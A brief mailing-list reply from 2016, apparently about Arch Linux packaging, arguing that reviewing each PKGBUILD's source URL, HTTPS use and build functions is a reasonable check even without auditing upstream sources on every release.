2 Jan
2016
2 Jan
'16
11:31 p.m.
But I also have to with a source-package since I won't check the sources with each release ;)
Which is plain stupid.
How is that stupid? Do you check the sources with each release? *How* do you perform those checks?
Perhaps there's a misunderstanding here. Not checking at least the PKGBUILD on each rebuild *would* be reckless at best and plain stupid at worst, but that's not what you suggested. Assuming trust in the upstream, I don't see too big an issue with simply asserting that the PKGBUILD pulls the source from the right place over an authenticated channel (i.e. HTTPS) and doesn't do anything weird in the build functions.